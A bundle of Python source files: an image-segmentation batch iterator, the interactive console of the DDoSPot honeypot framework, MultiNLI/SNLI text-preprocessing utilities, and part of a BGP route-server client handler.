else:
to_right = self.input_width
from_right = crop_left+self.input_width
img_crop = numpy.zeros((self.input_height, self.input_width, 3), dtype=numpy.uint8)
gt_crop = numpy.zeros((self.input_height, self.input_width), dtype=numpy.uint8)
img_crop[int(to_top):int(to_bottom), int(to_left):int(to_right), :] = img[int(from_top):int(from_bottom), int(from_left):int(from_right), :]
gt_crop[int(to_top):int(to_bottom), int(to_left):int(to_right)] = gt[int(from_top):int(from_bottom), int(from_left):int(from_right)]
if self.enable_horizon_flip and random.random() < 0.5:
img_crop = data_augmentation_util.horizon_flip(img_crop)
gt_crop = data_augmentation_util.horizon_flip(gt_crop)
# cv2.imshow('im', img_crop)
# cv2.imshow('gt', gt_crop)
# cv2.waitKey()
img_crop = img_crop.astype(dtype=numpy.float32)
gt_crop = gt_crop.astype(dtype=numpy.float32)
img_crop[:, :, 0] = img_crop[:, :, 0] - self.B_mean
img_crop[:, :, 1] = img_crop[:, :, 1] - self.G_mean
img_crop[:, :, 2] = img_crop[:, :, 2] - self.R_mean
gt_crop = gt_crop/255.0
im_batch[loop, :, :, :] = img_crop.transpose([2, 0, 1])
gt_batch[loop, 0, :, :] = gt_crop
# doing sample balance
pos_flag = gt_batch>0.5
num_pos = numpy.sum(pos_flag)
num_neg = gt_batch.size-num_pos
select_num_neg = min([num_pos*self.neg_ratio, num_neg])
prob_threshold = float(select_num_neg)/num_neg
prob_mat = numpy.random.random(gt_batch.shape)
prob_mat[pos_flag] = 1
mask_batch = numpy.zeros(gt_batch.shape, dtype=numpy.bool)
mask_batch[prob_mat<prob_threshold] = 1
mask_batch[pos_flag] = 1
data_batch.append_data(im_batch)
data_batch.append_label(mask_batch)
data_batch.append_label(gt_batch)
return data_batch
def reset(self):
pass
def getBatchsize(self):
return self.batch_size
def next(self, num_iter):
pass
if self.iter_next(num_iter):
return self.current_batch
def getdata(self):
pass
return self.current_batch.data
def getlabel(self):
pass
return self.current_batch.label
def getindex(self):
pass
return self.current_batch.index
def getpad(self):
pass
return self.current_batch.pad
def testPeopleSegPrefetchingIter():
logging.getLogger().setLevel(logging.DEBUG)
neg_ratio_list=[(10,2), (100,10), (200,20)]
myIter = ImageSegPrefetchingIter(dataPicklePath='./data/train_data_2017.6.22.pkl', \
nThread=5, \
batch_size=32, \
enable_horizon_flip=True,\
neg_ratio_list=neg_ratio_list)
numFetch = 1000
start = time.time()
for loop in range(numFetch):
data_batch = myIter.next(loop)
print loop
print 'tatol fetching time: %f s' % (time.time() - start)
if __name__ == '__main__':
testPeopleSegPrefetchingIter()
# test_MyDataBatch()
|
console.py
|
#!/usr/bin/env python3
import cmd
import configparser
import sys
import threading
try:
import colorama
except ImportError:
exit('Please install colorama for colorful console output: pip install colorama')
try:
import tabulate
except ImportError:
exit('Tabulate module is needed for interactive console: "pip install tabulate"')
import core.potloader as potloader
import core.utils as utils
import core.spf as spf
class DDoSPot(cmd.Cmd):
# one of the reasons for creating an object is that ExtensionsAt object contains a descriptor
# this descriptor is executed when accessing the attribute, and it will be executed when accessing
# plugins as a member variable
plugins = spf.ExtensionsAt(potloader.PotLoader)
pots = []
pot_names = []
def __init__(self, version):
cmd.Cmd.__init__(self)
# DDoSPot "constructor" will always be called (both in interactive and non-interactive mode)
# it is thus safe to init colorama here
colorama.init(autoreset=True)
self._read_config()
self.prompt = colorama.Fore.GREEN + 'ddp > '
self.doc_header = 'Available commands (use help <command> for detailed help):'
self.intro = colorama.Fore.YELLOW + '''
___ ___ ___ ___ _
| \| \ ___/ __| _ \___| |_
| |) | |) / _ \__ \ _/ _ \ _|
|___/|___/\___/___/_| \___/\__|
v%s
''' % (version) + colorama.Style.RESET_ALL + '''
[+] List enabled honeypots using "list"
[+] Start honeypot(s) using "start <honeypot>" or "start all"
[+] Use "help" to list all available commands
'''
def cmdloop(self, intro=None):
# avoid exiting the shell with CTRL-C
# enter another cmdloop instance instead
try:
cmd.Cmd.cmdloop(self)
except KeyboardInterrupt:
self.intro = ' '
self.cmdloop()
def do_list(self, args):
'''
list
======
Print the list of the available honeypots and corresponding status (enabled/disabled).
'''
pot_table = []
for pot in self.pots:
status = 'ENABLED' if pot['enabled'] else 'DISABLED'
pot_table.append((
pot['name'],
pot['desc'],
pot['version'],
pot['author'],
status
))
print('\nAvailable honeypots:\n')
print((self._indent(tabulate.tabulate(pot_table, headers=('Name', 'Description', 'Version', 'Author', 'Status')))))
def do_start(self, args):
'''
start
======
Usage: start [<honeypot>]
Start honeypot specified as an argument.
If no arguments are specified, start all honeypots configured in global.conf configuration file.
'''
# filter out incorrectly specified pots first
if args != '' and args not in self.pot_names:
utils.print_err('Honeypot "%s" is not available! Please use one of the available honeypots.' % (args))
self.do_list(None)
return
for pot in self.pots:
if args == '' or args == pot['name']:
if pot['enabled']:
state = pot['plugin'].status()
if state == 'Starting' or state == 'Running':
utils.print_warn('Honeypot "%s" starting or already running, will not start again' % (pot['name']))
continue
else:
# only ask user if the pot name is explicitly specified!
if args != '':
should_enable = ''
while should_enable not in ('y', 'n'):
should_enable = input(colorama.Fore.YELLOW + 'Honeypot "%s" is currently disabled - do you want to enable it and start it? [y/n] ' % (args)).lower().strip()
# enable the honeypot if user wants so (write it to config also!)
if should_enable == 'y':
pot['enabled'] = True
self.conf.set('honeypots', args, 'True')
print(('Enabling "%s"...' % (args)))
self._write_config()
else:
return
# skip pot if no pot name has been specified and pot is disabled
else:
continue
pot['plugin'].setup()
pot['thread'] = threading.Thread(target=pot['plugin'].run)
pot['thread'].start()
def do_stop(self, args):
'''
stop
======
Usage: stop [<honeypot>]
Stop honeypot specified as an argument.
If no arguments are specified, stop all currently running honeypots.
'''
pot_found = True if args == '' else False
for pot in self.pots:
if args == '' or args == pot['name']:
if pot['thread'] is None:
continue
pot_found = True
pot['plugin'].shutdown()
pot['thread'].join()
pot['thread'] = None
if not pot_found:
utils.print_err('Honeypot "%s" is not available or not started!' % (args))
return
def do_status(self, args):
'''
status
======
Usage: status <honeypot>
Print running status of the specified honeypot and gather statistics.
If no honeypot is specified, list short status of all currently running honeypots.
'''
status_table = []
for pot in self.pots:
if pot['thread'] is None:
continue
# long status for specific honeypot
# pot status function returns a dict and it must be placed in a list because of tabulate function
if args == pot['name']:
detailed_stats = pot['plugin'].status(short=False)
print(('\n%s status:\n' % (pot['name'])))
print((self._indent(tabulate.tabulate(self._flatten_stats(detailed_stats)))))
return
# if no honeypot has been specified, obtain short status
elif args == '':
status_table.append((pot['name'], pot['plugin'].status()))
if status_table:
print('\nHoneypot status:\n')
print((self._indent(tabulate.tabulate(status_table, headers=('Name', 'Status')))))
def do_exit(self, args):
'''Exit DDoSPot.'''
print('Exiting DDoSPot...')
self.do_stop('')
sys.exit(0)
def do_quit(self, args):
'''Exit DDoSPot.'''
self.do_exit(args)
def default(self, line):
'''Overriden default method in order to show custom error message when command is not recognized.'''
utils.print_err('Unknown command: %s\n' % (line))
self.do_help(None)
def emptyline(self):
'''When empty line is entered in a prompt, simply do nothing - do not repeat the last command.'''
pass
def _flatten_stats(self, stats):
# iterating through list of lists containing various honeypot stats
# typical format is [['Stat description', val], ['Stat2 description', val2] ...]
# if any of the element within the inner list is a tuple, flatten it for tabulate module
# beware - function assumes stats always have the specified format:
# - list with two-element lists
# - first element is always non-iterable, second element can be a tuple
flatten_stats = []
for stat in stats:
if isinstance(stat[1], tuple):
flatten_stats.append([stat[0], ''])
flatten_stats.extend(['', e] for e in stat[1])
else:
flatten_stats.append(stat)
return flatten_stats
# see https://bitbucket.org/astanin/python-tabulate/pull-requests/14/indent-option
def _indent(self, txt, spaces=4):
indented = '\n'.join(' '*spaces + ln for ln in txt.splitlines())
return indented + '\n'
def _read_config(self):
try:
self.conf = configparser.RawConfigParser()
self.conf.read('global.conf')
honeypots = self.conf.items('honeypots')
# load all plugin modules here and store all info to pots dict
loaded_plugins = spf.load_plugins(names=[x[0] for x in honeypots])
for plugin in self.plugins:
pot = {}
name = plugin.name()
pot['name'] = name
pot['version'] = loaded_plugins[name].__version__
pot['desc'] = loaded_plugins[name].__desc__
pot['author'] = loaded_plugins[name].__author__
pot['plugin'] = plugin
pot['thread'] = None
pot['enabled'] = self.conf.getboolean('honeypots', name)
self.pots.append(pot)
self.pot_names.append(name)
# sort the pot list for convenience
self.pots = sorted(self.pots, key=lambda k: k['name'])
except configparser.Error as msg:
utils.print_err('Error occurred while parsing global configuration file: %s' % msg)
return
def _write_config(self):
with open('global.conf', 'wb') as f:
self.conf.write(f)
|
data_processing.py
|
# -*- coding: utf-8 -*-
import numpy as np
import re
import random
import json
import collections
from tqdm import tqdm
import nltk
from nltk.corpus import wordnet as wn
import os
import pickle
from nltk.tag import StanfordNERTagger
from nltk.tag import StanfordPOSTagger
from chainer import cuda
LABEL_MAP = {
"entailment": 0,
"neutral": 1,
"contradiction": 2,
"hidden": -1
}
PADDING = "<PAD>"
POS_Tagging = [PADDING, 'WP$', 'RBS', 'SYM', 'WRB', 'IN', 'VB', 'POS', 'TO', ':', '-RRB-', '$', 'MD', 'JJ', '#', 'CD', '``', 'JJR', 'NNP', "''", 'LS', 'VBP', 'VBD', 'FW', 'RBR', 'JJS', 'DT', 'VBG', 'RP', 'NNS', 'RB', 'PDT', 'PRP$', '.', 'XX', 'NNPS', 'UH', 'EX', 'NN', 'WDT', 'VBN', 'VBZ', 'CC', ',', '-LRB-', 'PRP', 'WP']
POS_dict = {pos:i for i, pos in enumerate(POS_Tagging)}
base_path = os.getcwd()
nltk_data_path = base_path + "/../TF/nltk_data"
nltk.data.path.append(nltk_data_path)
stemmer = nltk.SnowballStemmer('english')
tt = nltk.tokenize.treebank.TreebankWordTokenizer()
# use
def load_nli_data(path, genre=None, snli=False, shuffle = True):
"""
Load MultiNLI or SNLI data.
If the "snli" parameter is set to True, a genre label of snli will be assigned to the data.
"""
data = []
with open(path) as f:
for line in tqdm(f):
loaded_example = json.loads(line)
if loaded_example["gold_label"] not in LABEL_MAP:
continue
loaded_example["label"] = LABEL_MAP[loaded_example["gold_label"]]
if snli:
loaded_example["genre"] = "snli"
if not genre or (genre and loaded_exapmle["genre"] == genre):
data.append(loaded_example)
if shuffle:
random.seed(1)
random.shuffle(data)
return data
def is_exact_match(token1, token2):
token1 = token1.lower()
token2 = token2.lower()
token1_stem = stemmer.stem(token1)
if token1 == token2:
return True
for synsets in wn.synsets(token2):
for lemma in synsets.lemma_names():
if token1_stem == stemmer.stem(lemma):
return True
if token1 == "n't" and token2 == "not":
return True
elif token1 == "not" and token2 == "n't":
return True
elif token1_stem == stemmer.stem(token2):
return True
return False
def is_antonyms(token1, token2):
token1 = token1.lower()
token2 = token2.lower()
token1_stem = stemmer.stem(token1)
antonym_lists_for_token2 = []
for synsets in wn.synsets(token2):
for lemma_synsets in [wn.synsets(l) for l in synsets.lemma_names()]:
for lemma_syn in lemma_synsets:
for lemma in lemma_syn.lemmas():
for antonym in lemma.antonyms():
antonym_lists_for_token2.append(antonym.name())
# if token1_stem == stemmer.stem(antonym.name()):
# return True
antonym_lists_for_token2 = list(set(antonym_lists_for_token2))
for atnm in antonym_lists_for_token2:
if token1_stem == stemmer.stem(atnm):
return True
return False
def worker(shared_content, dataset):
def tokenize(string):
string = re.sub(r'\(|\)', '', string)
return string.split()
for example in tqdm(dataset):
s1_tokenize = tokenize(example['sentence1_binary_parse'])
s2_tokenize = tokenize(example['sentence2_binary_parse'])
s1_token_exact_match = [0] * len(s1_tokenize)
s2_token_exact_match = [0] * len(s2_tokenize)
s1_token_antonym = [0] * len(s1_tokenize)
s2_token_antonym = [0] * len(s2_tokenize)
for i, word in enumerate(s1_tokenize):
matched = False
for j, w2 in enumerate(s2_tokenize):
matched = is_exact_match(word, w2)
if matched:
s1_token_exact_match[i] = 1
s2_token_exact_match[j] = 1
content = {}
content['sentence1_token_exact_match_with_s2'] = s1_token_exact_match
content['sentence2_token_exact_match_with_s1'] = s2_token_exact_match
shared_content[example["pairID"]] = content
# print(shared_content[example["pairID"]])
# print(shared_content)
def load_shared_content(fh, shared_content):
for line in fh:
row = line.rstrip().split("\t")
key = row[0]
value = json.loads(row[1])
shared_content[key] = value
def load_mnli_shared_content(config):
shared_file_exist = False
shared_path = config.data_path + "/shared.jsonl"
# shared_path = "../shared.json"
print(shared_path)
if os.path.isfile(shared_path):
shared_file_exist = True
# shared_content = {}
assert shared_file_exist
# if not shared_file_exist and config.use_exact_match_feature:
# with open(shared_path, 'w') as f:
# json.dump(dict(reconvert_shared_content), f)
# elif config.use_exact_match_feature:
with open(shared_path) as f:
shared_content = {}
load_shared_content(f, shared_content)
# shared_content = json.load(f)
return shared_content
def sentences_to_padded_index_sequences(datasets, config):
"""
Annotate datasets with feature vectors. Adding right-sided padding.
"""
# Extract vocabulary
def tokenize(string):
string = re.sub(r'\(|\)', '', string)
return string.split()
word_counter = collections.Counter()
char_counter = collections.Counter()
# mgr = multiprocessing.Manager()
# shared_content = mgr.dict()
# process_num = config.num_process_prepro
# process_num = 1
for i, dataset in enumerate(datasets):
# if not shared_file_exist:
# num_per_share = len(dataset) / process_num + 1
# jobs = [ multiprocessing.Process(target=worker, args=(shared_content, dataset[i * num_per_share : (i + 1) * num_per_share] )) for i in range(process_num)]
# for j in jobs:
# j.start()
# for j in jobs:
# j.join()
for example in tqdm(dataset):
s1_tokenize = tokenize(example['sentence1_binary_parse'])
s2_tokenize = tokenize(example['sentence2_binary_parse'])
word_counter.update(s1_tokenize)
word_counter.update(s2_tokenize)
for i, word in enumerate(s1_tokenize):
char_counter.update([c for c in word])
for word in s2_tokenize:
char_counter.update([c for c in word])
# shared_content = {k:v for k, v in shared_content.items()}
vocabulary = set([word for word in word_counter])
vocabulary = list(vocabulary)
if config.embedding_replacing_rare_word_with_UNK:
vocabulary = [PADDING, "<UNK>"] + vocabulary
else:
vocabulary = [PADDING] + vocabulary
# print(char_counter)
word_indices = dict(zip(vocabulary, range(len(vocabulary))))
indices_to_words = {v: k for k, v in word_indices.items()}
char_vocab = set([char for char in char_counter])
char_vocab = list(char_vocab)
char_vocab = [PADDING] + char_vocab
char_indices = dict(zip(char_vocab, range(len(char_vocab))))
indices_to_char = {v: k for k, v in char_indices.items()}
for i, dataset in enumerate(datasets):
for example in tqdm(dataset):
for sentence in ['sentence1_binary_parse', 'sentence2_binary_parse']:
example[sentence + '_index_sequence'] = np.zeros((config.seq_length), dtype=np.int32)
example[sentence + '_inverse_term_frequency'] = np.zeros((config.seq_length), dtype=np.float32)
token_sequence = tokenize(example[sentence])
padding = config.seq_length - len(token_sequence)
for i in range(config.seq_length):
if i >= len(token_sequence):
index = word_indices[PADDING]
itf = 0
else:
if config.embedding_replacing_rare_word_with_UNK:
index = word_indices[token_sequence[i]] if word_counter[token_sequence[i]] >= config.UNK_threshold else word_indices["<UNK>"]
else:
index = word_indices[token_sequence[i]]
itf = 1 / (word_counter[token_sequence[i]] + 1)
example[sentence + '_index_sequence'][i] = index
example[sentence + '_inverse_term_frequency'][i] = itf
example[sentence + '_char_index'] = np.zeros((config.seq_length, config.char_in_word_size), dtype=np.int32)
for i in range(config.seq_length):
if i >= len(token_sequence):
continue
else:
chars = [c for c in token_sequence[i]]
for j in range(config.char_in_word_size):
if j >= (len(chars)):
break
else:
index = char_indices[chars[j]]
example[sentence + '_char_index'][i,j] = index
return indices_to_words, word_indices, char_indices, indices_to_char
def get_subword_list(token):
token = token.lower()
token = "<" + token + ">"
subword_list = []
for i in [3,4,5,6]:
for j in range(len(token) - i + 1):
subword_list.append(token[j : j + i])
return subword_list
def load_subword_list(sentences, rand = False):
list_of_vectors = []
for sentence in sentences:
sentence_vector = []
for i in range(config.seq_length):
if i < len(sentence):
idx = range(len(sentence[i]))
if rand:
random.shuffle(idx)
token_subword_feature_list = [sentence[i][index] for index in idx][:config.subword_feature_len]
if len(token_subword_feature_list) < config.subword_feature_len:
token_subword_feature_list += [0] * (config.subword_feature_len - len(token_subword_feature_list))
sentence_vector.append(token_subword_feature_list)
else:
sentence_vector.append([0] * config.subword_feature_len)
list_of_vectors.append(sentence_vector)
return np.array(list_of_vectors)
def parsing_parse(parse):
base_parse = [s.rstrip(" ").rstrip(")") for s in parse.split("(") if ")" in s]
pos = [pair.split(" ")[0] for pair in base_parse]
return pos
def parse_to_pos_vector(parse, left_padding_and_cropping_pair = (0,0)): # ONE HOT
pos = parsing_parse(parse)
pos_vector = [POS_dict.get(tag,0) for tag in pos]
left_padding, left_cropping = left_padding_and_cropping_pair
vector = np.zeros((config.seq_length,len(POS_Tagging)))
assert left_padding == 0 or left_cropping == 0
for i in range(config.seq_length):
if i < len(pos_vector):
vector[i + left_padding, pos_vector[i + left_cropping]] = 1
else:
break
return vector
def generate_pos_feature_tensor(parses, left_padding_and_cropping_pairs):
pos_vectors = []
for parse in parses:
pos = parsing_parse(parse)
pos_vector = [(idx, POS_dict.get(tag, 0)) for idx, tag in enumerate(pos)]
pos_vectors.append(pos_vector)
return construct_one_hot_feature_tensor(pos_vectors, left_padding_and_cropping_pairs, 2, column_size=len(POS_Tagging))
def generate_pos_feature_vector(parse, seq_length):
pos = parsing_parse(parse)
pos_vector = [(idx, POS_dict.get(tag, 0)) for idx, tag in enumerate(pos)]
return construct_one_hot_feature_vector(pos_vector, 2, seq_length, column_size=len(POS_Tagging))
def construct_one_hot_feature_vector(sequence, dim, seq_length, column_size=None, dtype=np.int32):
if dim == 1:
vec = np.zeros((seq_length), dtype=dtype)
for num in sequence:
if num < seq_length:
vec[num] = 1
return vec
elif dim == 2:
assert column_size
mtrx = np.zeros((seq_length, column_size), dtype=dtype)
for row, col in sequence:
if row < seq_length and col < column_size:
mtrx[row, col] = 1
return mtrx
else:
raise NotImplementedError
def generate_quora_pos_feature_tensor(parses, left_padding_and_cropping_pairs):
pos_vectors = []
for parse in parses:
pos = parse.split()
pos_vector = [(idx, POS_dict.get(tag, 0)) for idx, tag in enumerate(pos)]
pos_vectors.append(pos_vector)
return construct_one_hot_feature_tensor(pos_vectors, left_padding_and_cropping_pairs, 2, column_size=len(POS_Tagging))
def generate_crop_pad_pairs(sequences):
seq_len = config.seq_length
list_of_pairs = []
for sequence in sequences:
left_padding = 0
left_cropping = 0
if len(sequence) < seq_len:
left_padding = int(random.uniform(0,1) * (seq_len - len(sequence)))
elif len(sequence) > seq_len:
left_cropping = int(random.uniform(0,1) * (len(sequence) - seq_len))
list_of_pairs.append((left_padding, left_cropping))
return list_of_pairs
def fill_feature_vector_with_cropping_or_padding(sequences, left_padding_and_cropping_pairs, dim, column_size=None, dtype=np.int32):
if dim == 1:
list_of_vectors = []
for sequence, pad_crop_pair in zip(sequences, left_padding_and_cropping_pairs):
vec = np.zeros((config.seq_length))
left_padding, left_cropping = pad_crop_pair
for i in range(config.seq_length):
if i + left_padding < config.seq_length and i - left_cropping < len(sequence):
vec[i + left_padding] = sequence[i + left_cropping]
else:
break
list_of_vectors.append(vec)
return np.array(list_of_vectors, dtype=dtype)
elif dim == 2:
assert column_size
tensor_list = []
for sequence, pad_crop_pair in zip(sequences, left_padding_and_cropping_pairs):
left_padding, left_cropping = pad_crop_pair
mtrx = np.zeros((config.seq_length, column_size))
for row_idx in range(config.seq_length):
if row_idx + left_padding < config.seq_length and row_idx < len(sequence) + left_cropping:
for col_idx, content in enumerate(sequence[row_idx + left_cropping]):
mtrx[row_idx + left_padding, col_idx] = content
else:
break
tensor_list.append(mtrx)
return np.array(tensor_list, dtype=dtype)
else:
raise NotImplementedError
def construct_one_hot_feature_tensor(sequences, left_padding_and_cropping_pairs, dim, column_size=None, dtype=np.int32):
"""
sequences: [[(idx, val)... ()]...[]]
left_padding_and_cropping_pairs: [[(0,0)...] ... []]
"""
tensor_list = []
for sequence, pad_crop_pair in zip(sequences, left_padding_and_cropping_pairs):
left_padding, left_cropping = pad_crop_pair
if dim == 1:
vec = np.zeros((config.seq_length))
for num in sequence:
if num + left_padding - left_cropping < config.seq_length and num + left_padding - left_cropping >= 0:
vec[num + left_padding - left_cropping] = 1
tensor_list.append(vec)
elif dim == 2:
assert column_size
mtrx = np.zeros((config.seq_length, column_size))
for row, col in sequence:
if row + left_padding - left_cropping < config.seq_length and row + left_padding - left_cropping >= 0 and col < column_size:
mtrx[row + left_padding - left_cropping, col] = 1
tensor_list.append(mtrx)
else:
raise NotImplementedError
return np.array(tensor_list, dtype=dtype)
def generate_manual_sample_minibatch(s1_tokenize, s2_tokenize, word_indices, char_indices):
nst = StanfordNERTagger('/home/users/yichen.gong/Stanford/stanford-ner-2014-08-27/classifiers/english.muc.7class.distsim.crf.ser.gz', '//home/users/yichen.gong/Stanford/stanford-ner-2014-08-27/stanford-ner.jar',encoding='utf-8')
pst = StanfordPOSTagger('/home/users/yichen.gong/Stanford/stanford-postagger-2014-08-27/models/english-bidirectional-distsim.tagger', \
'/home/users/yichen.gong/Stanford/stanford-postagger-2014-08-27/stanford-postagger.jar')
premise_vectors = np.zeros((1, config.seq_length))
hypothesis_vectors = np.zeros((1, config.seq_length))
premise_char_vectors = np.zeros((1, config.seq_length, config.char_in_word_size))
hypothesis_char_vectors = np.zeros((1, config.seq_length, config.char_in_word_size))
premise_exact_match = np.zeros((1, config.seq_length))
hypothesis_exact_match = np.zeros((1, config.seq_length))
for idx, w1 in enumerate(s1_tokenize):
premise_vectors[0, idx] = word_indices.get(w1, 0)
for ci, c in enumerate(w1):
premise_char_vectors[0, idx, ci] = char_indices.get(c, 0)
for s2idx, w2 in enumerate(s2_tokenize):
if is_exact_match(w1, w2):
premise_exact_match[0, idx] = 1
hypothesis_exact_match[0, s2idx] = 1
for idx, w2 in enumerate(s2_tokenize):
hypothesis_vectors[0, idx] = word_indices.get(w2, 0)
for ci, c in enumerate(w2):
hypothesis_char_vectors[0, idx, ci] = char_indices.get(c, 0)
premise_pos_vectors = np.zeros((1, config.seq_length, len(POS_dict.keys())))
hypothesis_pos_vectors = np.zeros((1, config.seq_length, len(POS_dict.keys())))
s1_pos = pst.tag(s1_tokenize)
s2_pos = pst.tag(s2_tokenize)
for idx, pair in enumerate(s1_pos):
word, tag = pair
premise_pos_vectors[0, idx, POS_dict[tag]] = 1
for idx, pair in enumerate(s2_pos):
word, tag = pair
hypothesis_pos_vectors[0, idx, POS_dict[tag]] = 1
# s1_ner = nst.tag(s1_tokenize)
# s2_ner = nst.tag(s2_tokenize)
# not used
labels = np.zeros((1))
genres = np.zeros((1))
pairIDs = np.zeros((1))
premise_inverse_term_frequency = np.zeros((1, config.seq_length, 1), dtype=np.float32)
hypothesis_inverse_term_frequency = np.zeros((1, config.seq_length, 1), dtype=np.float32)
premise_antonym_feature = np.zeros((1, config.seq_length))
hypothesis_antonym_feature = np.zeros((1, config.seq_length))
premise_NER_feature = np.zeros((1, config.seq_length, 7))
hypothesis_NER_feature = np.zeros((1, config.seq_length, 7))
premise_exact_match = np.expand_dims(premise_exact_match, 2)
hypothesis_exact_match = np.expand_dims(hypothesis_exact_match, 2)
premise_antonym_feature = np.expand_dims(premise_antonym_feature, 2)
hypothesis_antonym_feature = np.expand_dims(hypothesis_antonym_feature, 2)
return premise_vectors, hypothesis_vectors, labels, genres, premise_pos_vectors, \
hypothesis_pos_vectors, pairIDs, premise_char_vectors, hypothesis_char_vectors, \
premise_exact_match, hypothesis_exact_match, premise_inverse_term_frequency, hypothesis_inverse_term_frequency, \
premise_antonym_feature, hypothesis_antonym_feature, premise_NER_feature, hypothesis_NER_feature
def loadEmbedding_zeros(path, word_indices):
"""
Load GloVe embeddings. Initializng OOV words to vector of zeros.
"""
emb = np.zeros((len(word_indices), config.word_emb_size), dtype='float32')
with open(path, 'r') as f:
for i, line in enumerate(f):
if config.word_emb_load_num != None:
if i >= config.word_emb_load_num:
break
s = line.split()
if s[0] in word_indices:
emb[word_indices[s[0]], :] = np.asarray(s[1:])
return emb
def loadEmbedding_fully_rand(path, word_indices, divident = 1.0):
n = len(word_indices)
m = config.word_emb_size
emb = np.empty((n, m), dtype=np.float32)
emb[:,:] = np.random.normal(size=(n,m)) / divident
# Explicitly assign embedding of <PAD> to be zeros.
emb[0, :] = np.zeros((1,m), dtype="float32")
return emb
def loadEmbedding_rand(path, word_indices, divident = 1.0): # TODO double embedding
"""
Load GloVe embeddings. Doing a random normal initialization for OOV words.
"""
j = 0
n = len(word_indices)
m = config.word_emb_size
emb = np.empty((n, m), dtype=np.float32)
emb[:,:] = np.random.normal(size=(n,m)) / divident
# Explicitly assign embedding of <PAD> to be zeros.
emb[0, :] = np.zeros((1,m), dtype="float32")
with open(path, 'r', encoding='utf-8') as f:
for i, line in enumerate(f):
if config.word_emb_load_num != None:
if i >= config.word_emb_load_num:
break
s = line.split()
if s[0] in word_indices:
try:
emb[word_indices[s[0]], :] = np.asarray(s[1:])
except ValueError:
print(s[0])
continue
return emb
def all_lemmas(token):
t = token.lower()
lemmas = []
for synsets in wn.synsets(t):
for lemma in synsets.lemma_names():
lemmas.append(lemma)
return list(set(lemmas))
def loadEmbedding_with_lemma(path, word_indices):
j = 0
n = len(word_indices)
m = config.word_emb_size
emb = np.empty((n, m), dtype=np.float32)
emb[:,:] = np.random.normal(size=(n,m))
# Explicitly assign embedding of <PAD> to be zeros.
emb[0, :] = np.zeros((1,m), dtype="float32")
records = np.zeros((n))
indices_to_words = [""] * n
for key, val in word_indices.items():
indices_to_words[val] = key
print("OOV words: {}".format(n - np.sum(records) - 1))
print("Loading embedding for first round")
with open(path, 'r') as f:
for i, line in tqdm(enumerate(f)):
if config.word_emb_load_num != None:
if i >= config.word_emb_load_num:
break
s = line.split()
if s[0] in word_indices:
try:
emb[word_indices[s[0]], :] = np.asarray(s[1:])
records[word_indices[s[0]]] = 1
except ValueError:
print(s[0])
continue
print("OOV words: {}".format(n - np.sum(records) - 1))
print("Building OOV lemma sets")
OOV_word_indices = {}
for i in range(n):
if records[i] == 0:
for lemma in all_lemmas(indices_to_words[i]):
try:
OOV_word_indices[lemma].append(i)
except:
OOV_word_indices[lemma] = [i]
print("Loading embedding for second round")
with open(path, 'r') as f:
for i, line in tqdm(enumerate(f)):
if config.word_emb_load_num != None:
if i >= config.word_emb_load_num:
break
s = line.split()
if s[0] in OOV_word_indices:
for idx in OOV_word_indices[s[0]]:
if records[idx] == 0:
try:
emb[idx, :] = np.asarray(s[1:])
records[idx] = 1
except ValueError:
print(s[0])
continue
print("OOV words: {}".format(n - np.sum(records) - 1))
return emb
def save_submission(path, ids, pred_ids):
assert(ids.shape[0] == pred_ids.shape[0])
reverse_label_map = {str(value): key for key, value in LABEL_MAP.items()}
f = open(path, 'w')
f.write("pairID,gold_label\n")
for i in range(ids.shape[0]):
pred = pred_ids[i] if not config.force_multi_classes else pred_ids[i] / config.forced_num_multi_classes
f.write("{},{}\n".format(str(ids[i]), reverse_label_map[str(pred)]))
f.close()
|
route_server.py
|
#!/usr/bin/env python
# Author:
# Muhammad Shahbaz (muhammad.shahbaz@gatech.edu)
# Rudiger Birkner (Networked Systems Group ETH Zurich)
# Arpit Gupta (Princeton)
import argparse
from collections import namedtuple
import json
from multiprocessing.connection import Listener, Client
import os
import Queue
import sys
from threading import Thread, Lock
import time
import socket
import struct
np = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
if np not in sys.path:
sys.path.append(np)
import util.log
from server import server as Server
logger = util.log.getLogger('XRS')
Config = namedtuple('Config', 'ah_socket')
bgpListener = None
config = None
participantsLock = Lock()
participants = dict()
portip2participant = dict()
clientPoolLock = Lock()
clientActivePool = dict()
clientDeadPool = set()
count_lock = Lock()
def create_sig():
with open('sig', 'w+') as f:
pass
class PctrlClient(object):
def __init__(self, conn, addr):
self.conn = conn
self.addr = addr
self.run = True
self.id = None
self.peers_in = []
self.peers_out = []
def start(self):
logger.info('BGP PctrlClient started for client ip %s.', self.addr)
msg_buff = ''
while self.run:
try:
rv = self.conn.recv(4096)
except EOFError as ee:
break
if not rv:
break
logger.debug('PctrlClient: Trace: Got rv, original route: %s', rv)
msg_buff += rv
offset = 0
buff_len = len(msg_buff)
while buff_len - offset >= 2:
msg_len = ord(msg_buff[offset]) | ord(msg_buff[offset + 1]) << 8
if buff_len - offset < msg_len:
break
data = msg_buff[offset + 2: offset + msg_len]
if data == 'stop':
with count_lock:
bgpListener.stop_counts += 1
logger.info("stop_counts:%d" % bgpListener.stop_counts)
if bgpListener.stop_counts == bgpListener.as_num:
logger.info("last stop signal received, exiting...")
with open('result', 'w+') as f:
f.write('route_count:%d start_time:%0.6f end_time:%0.6f' % (bgpListener.route_id + 1, bgpListener.start_time, bgpListener.end_time))
bgpListener.run = False
self.run = False
break
else:
data = json.loads(data)
self.process_message(**data)
offset += msg_len
msg_buff = msg_buff[offset:]
self.conn.close()
# remove self
with clientPoolLock:
logger.debug('Trace: PctrlClient.start: clientActivePool before: %s', clientActivePool)
logger.debug('Trace: PctrlClient.start: clientDeadPool before: %s', clientDeadPool)
t = clientActivePool[self]
del clientActivePool[self]
clientDeadPool.add(t)
logger.debug('Trace: PctrlClient.start: clientActivePool after: %s', clientActivePool)
logger.debug('Trace: PctrlClient.start: clientDeadPool after: %s', clientDeadPool)
with participantsLock:
logger.debug('Trace: PctrlClient.start: portip2participant before: %s', portip2participant)
logger.debug('Trace: PctrlClient.start: participants before: %s', participants)
found = [k for k,v in portip2participant.items() if v == self.id]
for k in found:
del portip2participant[k]
found = [k for k,v in participants.items() if v == self]
for k in found:
del participants[k]
logger.debug('Trace: PctrlClient.start: portip2participant after: %s', portip2participant)
logger.debug('Trace: PctrlClient.start: participants after: %s', participants)
def process_message(self, msgType=None, **data):
if msgType == 'hello':
rv = self.process_hello_message(**data)
elif msgType == 'bgp':
rv = self.process_bgp_message(**data)
else:
logger.warn("Unrecognized or absent msgType: %s. Message ignored.", msgType)
rv = True
return rv
